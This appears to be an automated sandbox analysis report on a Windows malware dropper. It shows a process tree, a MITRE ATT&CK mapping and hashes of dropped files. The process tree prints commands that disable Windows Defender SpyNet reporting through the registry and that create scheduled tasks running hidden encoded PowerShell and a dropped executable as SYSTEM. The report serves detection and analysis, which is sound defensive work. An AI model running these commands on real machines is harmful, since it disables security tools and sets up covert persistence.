                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:4980
                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4696
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4848
                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:3508
                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                            PID:2268
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "glXJtTKwq" /SC once /ST 00:01:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:4600
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /run /I /tn "glXJtTKwq"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:3452
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /DELETE /F /TN "glXJtTKwq"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4476
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:12:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\bbbRMuC.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                            PID:5904
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4308 -ip 4308
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:5096
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4300 -ip 4300
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:4032
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4308 -ip 4308
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:5252
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 1204 -ip 1204
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3508
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4164 -ip 4164
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:4904
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 2412 -ip 2412
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4480
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4308 -ip 4308
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4164 -ip 4164
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6100
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4308 -ip 4308
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:5988
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4164 -ip 4164
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 4308 -ip 4308
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:6040
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4164 -ip 4164
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4012
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:3260
                                                                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:2864
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:992
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4308 -ip 4308
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:1504
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4996 -ip 4996
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:5716
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4308 -ip 4308
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:5972
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4164 -ip 4164
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4372
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4164 -ip 4164
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:1788
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\jfvffjr
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\jfvffjr
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:4268
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4164 -ip 4164
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5180
                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6080
                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5520
                                                                                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:1504
                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:4320

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                          New Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1050

                                                                                                                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1158

                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                          New Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1050

                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                          T1158

                                                                                                                                                                                                                                                                          Impair Defenses

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1562

                                                                                                                                                                                                                                                                          File Permissions Modification

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1222

                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                          Process Discovery

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1057

                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                          Impact

                                                                                                                                                                                                                                                                          Service Stop

                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                          T1489

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sotema_7.exe.log
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            84cfdb4b995b1dbf543b26b86c863adc

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            d2f47764908bf30036cf8248b9ff5541e2711fa2

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurl.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurl.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurlpp.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libcurlpp.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libstdc++-6.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libstdc++-6.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libwinpthread-1.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\libwinpthread-1.dll
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5f7ba8143c4972572616b8a6d276bb75

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b8e513a74b825e183ba88d6a3eafdb638c263640

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            82594365c8fbfdbe9518dfbf8e0aadb20819401a691b9a3f4aa7da26ab7fe35d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4ae453c1b44eb69f8d006cb64e1ceb2f7f5852fa0240e03d597f11a411e4509555cf6d8dcafb2dfd9dba6fc546128e8ae82afdd1cd54a66d8451a37257ce58d8

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\setup_install.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            5f7ba8143c4972572616b8a6d276bb75

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b8e513a74b825e183ba88d6a3eafdb638c263640

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            82594365c8fbfdbe9518dfbf8e0aadb20819401a691b9a3f4aa7da26ab7fe35d

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            4ae453c1b44eb69f8d006cb64e1ceb2f7f5852fa0240e03d597f11a411e4509555cf6d8dcafb2dfd9dba6fc546128e8ae82afdd1cd54a66d8451a37257ce58d8

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_1.txt
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d7cf78337caf7883c9f8b186fb577703

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            82c15f16cc293f7bb1dd2803dc4fbf3f172704e0

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            3520ea8b719e1dd4dae76882ef73e38eae549e78b871d6f28166264339fe77ef

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            f17584ef6d9dccafe5df3df29fbb4b3d8fdcb9e5517be36664a13d14c4bdf8825f05ee1f010081db4bfa0df26a372cd480fccee4c3ebe11acb47fb189987508c

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_2.txt
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            d7cf78337caf7883c9f8b186fb577703

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            82c15f16cc293f7bb1dd2803dc4fbf3f172704e0

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            3520ea8b719e1dd4dae76882ef73e38eae549e78b871d6f28166264339fe77ef

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            f17584ef6d9dccafe5df3df29fbb4b3d8fdcb9e5517be36664a13d14c4bdf8825f05ee1f010081db4bfa0df26a372cd480fccee4c3ebe11acb47fb189987508c

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.exe
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            cd7484811f927da2302bb6a1054802cf

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            e19672a18f519e7b67d9bd4ce29f82c503b146ff

                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                            07c90bc38116212caa3e704a39f04c60d204659ae6b0a59b7b172a15ca4dc8d7

                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                            356b7b88eafa73f12269f31be30be88456c1191c674b669b64a5142fb9f26a24f0937ab6b8b6ac18c5eacd81388f22ca89b6a04a7f13495905587c72886dc81b

                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC1CDE95D\sotema_3.txt
                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                            cd7484811f927da2302bb6a1054802cf

                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                            e19672a18f519e7b67d9bd4ce29f82c503b146ff

                                                                                                                                                                                                                                                                            SHA256

